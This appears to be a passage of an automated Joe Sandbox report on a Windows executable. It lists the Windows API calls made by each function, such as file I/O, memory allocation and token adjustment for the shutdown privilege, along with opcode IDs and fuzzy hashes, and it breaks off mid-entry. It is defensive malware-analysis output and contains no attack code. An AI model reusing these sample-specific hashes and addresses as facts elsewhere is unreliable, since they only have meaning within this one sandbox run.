                                          • Instruction Fuzzy Hash: A7F0CD702102019BD725EB65EE49B6673A4EF84305F14483BE204763E2C7BD5C90DBDD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00407443
                                          • GetLastError.KERNEL32(?,?,?,00000000), ref: 0040744B
                                            • Part of subcall function 00407390: GetLastError.KERNEL32(<r@,004071ED,?,020403CC,?,004098AE,00000001,00000000,00000002,00000000,00409EBB,?,00000000,00409F05), ref: 00407393
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorLast$FilePointer
                                          • String ID:
                                          • API String ID: 1156039329-0
                                          • Opcode ID: e46534d7d6c06c2f98e8bee60b66bb92ee3723b23284c2abdcea7b00b07b3c78
                                          • Instruction ID: 9939ab9056f0822041df34d86dac8fc00f3a42cdeedc0b59fd8d9b3697e95dde
                                          • Opcode Fuzzy Hash: e46534d7d6c06c2f98e8bee60b66bb92ee3723b23284c2abdcea7b00b07b3c78
                                          • Instruction Fuzzy Hash: A4E092B66082006BD600F99DC881A9B37DCDF85364F01413ABA68EB1C2D675AC00C376
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadFile.KERNEL32(?,0040BDE0,0000000C,?,00000000,0000000C,0040BDE0,0000000C,00000000,004073F8,?,0040BDE0,?,004098F1,00000000,00409E99), ref: 004073BB
                                          • GetLastError.KERNEL32(?,0040BDE0,0000000C,?,00000000,0000000C,0040BDE0,0000000C,00000000,004073F8,?,0040BDE0,?,004098F1,00000000,00409E99), ref: 004073CA
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastRead
                                          • String ID:
                                          • API String ID: 1948546556-0
                                          • Opcode ID: e914567cb13969067943345982a8a313c8c116114bd4ea159f247cfbe41961e0
                                          • Instruction ID: 13490c32c9f7ee086a49088034a9beb1796989a54081e25f46ccf46c3bbabe17
                                          • Opcode Fuzzy Hash: e914567cb13969067943345982a8a313c8c116114bd4ea159f247cfbe41961e0
                                          • Instruction Fuzzy Hash: 1BE06DA16081506AEB24A65AA884E6B67DC8BC5325F05807BFE04DA281D6B8DC00D376
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetFilePointer.KERNEL32(?,00000000,00409F09,00000001,00000000,00000001,00407803,?,0040BDE0,?), ref: 0040729F
                                          • GetLastError.KERNEL32(?,00000000,00409F09,00000001,00000000,00000001,00407803,?,0040BDE0,?), ref: 004072AB
                                            • Part of subcall function 00407390: GetLastError.KERNEL32(<r@,004071ED,?,020403CC,?,004098AE,00000001,00000000,00000002,00000000,00409EBB,?,00000000,00409F05), ref: 00407393
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorLast$FilePointer
                                          • String ID:
                                          • API String ID: 1156039329-0
                                          • Opcode ID: 727037b0f09b88640473c885d25518507a72e987a24e9ef388c6271a82f97a39
                                          • Instruction ID: f446756f45e5f2ba1f545924375f0d55a30696ac3283ac729030538f8c345fd2
                                          • Opcode Fuzzy Hash: 727037b0f09b88640473c885d25518507a72e987a24e9ef388c6271a82f97a39
                                          • Instruction Fuzzy Hash: 9BE04FB16006109FEB10EEB98881B6273D8AF05364F0585BAFA24DF2C5D274DC00C765
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Virtual$AllocFree
                                          • String ID:
                                          • API String ID: 2087232378-0
                                          • Opcode ID: 975b7fb2a686225bee9c52d91c62591a405f54c0ca2a93298412ee223aec9d09
                                          • Instruction ID: 0a9bdec6e0d4ada2bc80af5311ae0c0d9c5226b5e0cec20c8283fd4eb37d5a7f
                                          • Opcode Fuzzy Hash: 975b7fb2a686225bee9c52d91c62591a405f54c0ca2a93298412ee223aec9d09
                                          • Instruction Fuzzy Hash: 0FF02772B0032017DB20696A0CC1B536AC59F85B90F1540BBFA4CFF3FAD2B98C0042AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSystemDefaultLCID.KERNEL32(00000000,00405382), ref: 0040526B
                                            • Part of subcall function 00404CA8: LoadStringA.USER32 ref: 00404CC5
                                            • Part of subcall function 004051D8: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040B4BC,00000001,?,004052A3,?,00000000,00405382), ref: 004051F6
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: DefaultInfoLoadLocaleStringSystem
                                          • String ID:
                                          • API String ID: 1658689577-0
                                          • Opcode ID: cb0487420b3172c234957d8210b1a1e7d96addb770309c7ff4572b3558b5ad4f
                                          • Instruction ID: 5ab3b431dc833c381f6376774c2282f43a01c3060f713a21c8c4142fa45d119f
                                          • Opcode Fuzzy Hash: cb0487420b3172c234957d8210b1a1e7d96addb770309c7ff4572b3558b5ad4f
                                          • Instruction Fuzzy Hash: 80316D75E00109ABCB00EF95CC809EEB379FF84304F518577E815BB285E739AE018B98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CharPrevA.USER32(00000000,00000000,?,?,?,00000000,0040685E,00000000,00406884,?,?,?,?,00000000,?,00406899), ref: 00406800
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CharPrev
                                          • String ID:
                                          • API String ID: 122130370-0
                                          • Opcode ID: 8c931f58bc880db98d68e9c8f4dbceab4e5d30aa373b7925f51b50f0d4df4d8b
                                          • Instruction ID: cd3b748fd999092e0dd41bd66ea10e28c532175b200e518a919150fcc3457b7d
                                          • Opcode Fuzzy Hash: 8c931f58bc880db98d68e9c8f4dbceab4e5d30aa373b7925f51b50f0d4df4d8b
                                          • Instruction Fuzzy Hash: A3F0BE523019241BC6117A7F18818AF66CC8B8574D742817FF502EB382ED3DAE1362AE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 6CAD5CA0.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0040727C
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aadca9e125a753c57296c915bcb0ab55ba595cf73d81ce89ea44cdbc5a070b64
                                          • Instruction ID: 5bd8415a33b32774670a026ed371ba3c899a528441b6bf43d5ab29e5e2c7c723
                                          • Opcode Fuzzy Hash: aadca9e125a753c57296c915bcb0ab55ba595cf73d81ce89ea44cdbc5a070b64
                                          • Instruction Fuzzy Hash: 92E0E5753442483EE380AAFCAD42FA667DC970A714F008022B998EB281D9759D219AA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 004067D8: CharPrevA.USER32(00000000,00000000,?,?,?,00000000,0040685E,00000000,00406884,?,?,?,?,00000000,?,00406899), ref: 00406800
                                          • 6CF478A0.KERNEL32(00000000,00000000,00406884,?,?,?,?,00000000,?,00406899,00406BD3,00000000,00406C18,?,?,?), ref: 00406867
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CharF478Prev
                                          • String ID:
                                          • API String ID: 808134145-0
                                          • Opcode ID: 4eec67744853805212579f3f2e131bb21c27f24265a6f9aeaabd8a63ef93bdb4
                                          • Instruction ID: cf8619df364c692642b75c2ad68c5631abdbe379fd6a5d417733308921cf3789
                                          • Opcode Fuzzy Hash: 4eec67744853805212579f3f2e131bb21c27f24265a6f9aeaabd8a63ef93bdb4
                                          • Instruction Fuzzy Hash: 8DE06531204304BFD701FA629C5295AB7ECD789748B924876B905B7581D5785E108568
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteFile.KERNEL32(?,02057D98,000BE200,?,00000000,000BE200,?,?,02057D98,00409CCE), ref: 00407497
                                            • Part of subcall function 00407390: GetLastError.KERNEL32(<r@,004071ED,?,020403CC,?,004098AE,00000001,00000000,00000002,00000000,00409EBB,?,00000000,00409F05), ref: 00407393
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastWrite
                                          • String ID:
                                          • API String ID: 442123175-0
                                          • Opcode ID: 024c1dbc51d9d56445248a5641ebfab788c56811afa19e4740f31fd3b9e459d0
                                          • Instruction ID: 38cc9a4b820c908ade272dde7143f440ba8a68471926a725f46627d21603aec7
                                          • Opcode Fuzzy Hash: 024c1dbc51d9d56445248a5641ebfab788c56811afa19e4740f31fd3b9e459d0
                                          • Instruction Fuzzy Hash: 1CE012727081107BD720E65ED880E5B67DCDFC5764F00407BBA04EB281D578AC049776
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 6CAD5CA0.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0040727C
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 720fa26f6d7c147ae79ffad1078871bf0afb9153a9a3787685cc00f5a5ad9a0b
                                          • Instruction ID: aa70f73b4ad7123efe22fc05ec8d864e060c25a8f4bd804b8909c9a15069892f
                                          • Opcode Fuzzy Hash: 720fa26f6d7c147ae79ffad1078871bf0afb9153a9a3787685cc00f5a5ad9a0b
                                          • Instruction Fuzzy Hash: 6AE01A753442483EE380EEFCAD42FA677DC970A714F008022B998EB381D9759D219BB9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00408DCB,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004070F7
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FormatMessage
                                          • String ID:
                                          • API String ID: 1306739567-0
                                          • Opcode ID: 49433d0f93936c3e5235eb52ca7e2b20e5004c0b9c26b20b11e93211e7aeeb57
                                          • Instruction ID: 3e9af00247863558707ead0c9bedca69137528a3dbc213c9ebd51d15e106523e
                                          • Opcode Fuzzy Hash: 49433d0f93936c3e5235eb52ca7e2b20e5004c0b9c26b20b11e93211e7aeeb57
                                          • Instruction Fuzzy Hash: 66E0D8B178C30125F22500644C47F76520947C0704F20813A3710EE3E2D9BEB906115F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetEndOfFile.KERNEL32(?,02057D98,00409CB0), ref: 0040746B
                                            • Part of subcall function 00407390: GetLastError.KERNEL32(<r@,004071ED,?,020403CC,?,004098AE,00000001,00000000,00000002,00000000,00409EBB,?,00000000,00409F05), ref: 00407393
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorFileLast
                                          • String ID:
                                          • API String ID: 734332943-0
                                          • Opcode ID: 0617febd3252712e40b0bf1ced51356aff65a3d5f8e53557862437d7bb07380b
                                          • Instruction ID: a2612de60f5c6a42fed200a765be981a26f664ba087cc82ebbfa88963db20d0e
                                          • Opcode Fuzzy Hash: 0617febd3252712e40b0bf1ced51356aff65a3d5f8e53557862437d7bb07380b
                                          • Instruction Fuzzy Hash: EBC04CE560421157DB00EAAA89C190667DC5A482593014076FA14DF256D678E8009619
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNEL32(?,00406E6D), ref: 00406E60
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: a56ca0b8faf8d1e330e126b017f71b34cc6a81dc34f8c707e1e286838e3cde92
                                          • Instruction ID: c16e80c3071607a55ceed432c86fff4652f516d6b34bf8a23abf834d9a37f925
                                          • Opcode Fuzzy Hash: a56ca0b8faf8d1e330e126b017f71b34cc6a81dc34f8c707e1e286838e3cde92
                                          • Instruction Fuzzy Hash: 4DB09B7A70C3006FE705ABA5FC1142863D4D7C4B107E24877F110D25C1D53C54104618
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNEL32(?,00406E6D), ref: 00406E60
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: afb7a3705be87c655b88a01161792b2ff533eda17e129e871f6243dd462d7bce
                                          • Instruction ID: daf783ab61578579cf625219c76c2fc0142693dae816566a5d16650f7a9fa9bd
                                          • Opcode Fuzzy Hash: afb7a3705be87c655b88a01161792b2ff533eda17e129e871f6243dd462d7bce
                                          • Instruction Fuzzy Hash: FDA022ACC00300B3CE00B3E8C83082C23282A88F003E208AA3322B20C0C03E80000208
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00401631
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: cc502ff02348c5ca14464282c50bf6d9044616516d427296b297e1b86820bb76
                                          • Instruction ID: 8a4128db402ff564317842b1528136efc943efb3ec0006f7d13b38747f41841c
                                          • Opcode Fuzzy Hash: cc502ff02348c5ca14464282c50bf6d9044616516d427296b297e1b86820bb76
                                          • Instruction Fuzzy Hash: 41113CB2A057019FC3109F29CD80A1BB7E5EBC4760F19C93DE598A73A5D736AC408699
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualFree.KERNEL32(00000000,00000000,00004000,?,?,?,?,?,004018BF), ref: 004016B2
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FreeVirtual
                                          • String ID:
                                          • API String ID: 1263568516-0
                                          • Opcode ID: cb90924cff6733cc6eacdcc881367b727e1878aa05a1c28612b22713fd768cab
                                          • Instruction ID: 16a4501794763894d112e8f61db517d820fca643a48b443a7e05d48f47cfc21a
                                          • Opcode Fuzzy Hash: cb90924cff6733cc6eacdcc881367b727e1878aa05a1c28612b22713fd768cab
                                          • Instruction Fuzzy Hash: B501A7726443144BC310AF28DDC092A77D5DB85364F19497ED985B73A2D33B6C0587EC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          • Opcode ID: e00d840cbfc5ea24e9f986c1a7855b527cb7041839e6c9887e7e6ca8da466a72
                                          • Instruction ID: 85bc6db19389d6a952aef3f805f65b257ae3a7b44276564e27daf6f5ee319632
                                          • Opcode Fuzzy Hash: e00d840cbfc5ea24e9f986c1a7855b527cb7041839e6c9887e7e6ca8da466a72
                                          • Instruction Fuzzy Hash: 69D02E81B00A6017E311F6FF088875682C84F88644B08847EFA48E33C1D67CEC01838A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,00407D01), ref: 00407BE0
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FreeVirtual
                                          • String ID:
                                          • API String ID: 1263568516-0
                                          • Opcode ID: bbebfbd3f2e0ee76b194d8dca6bfc3418916f620836008a8be59738a7b03f453
                                          • Instruction ID: 2a6adca33b943734a4b37ef61053050b2fe8d794beb6ab185d3a086b925497b7
                                          • Opcode Fuzzy Hash: bbebfbd3f2e0ee76b194d8dca6bfc3418916f620836008a8be59738a7b03f453
                                          • Instruction Fuzzy Hash: B5D09EB1B142005FDB94DF794CC1B0336D87B08600B2184766908DB286F774E5108B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000028), ref: 0040911B
                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00409121
                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0040913D
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00409164
                                          • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00409169
                                            • Part of subcall function 004090EC: MessageBoxA.USER32 ref: 00409106
                                          • 6CF44E70.USER32(00000002,00000000), ref: 0040917D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupMessageOpenPrivilegePrivilegesValue
                                          • String ID: SeShutdownPrivilege
                                          • API String ID: 3685916817-3733053543
                                          • Opcode ID: 766c9eae409e4428d95651925f21777e1d2dbafd31ccba6e4e2cdc7febf8915c
                                          • Instruction ID: 1409d14ab55289f2435dae64a009ab5e175d67aad5efb1a6462be2348c7f8ed4
                                          • Opcode Fuzzy Hash: 766c9eae409e4428d95651925f21777e1d2dbafd31ccba6e4e2cdc7febf8915c
                                          • Instruction Fuzzy Hash: 81F0E170784303B5F610B6A28D0BF1B619C5B94708F50843FBA54B91C3D67D9C04866F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSystemTime.KERNEL32(?), ref: 004026CE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
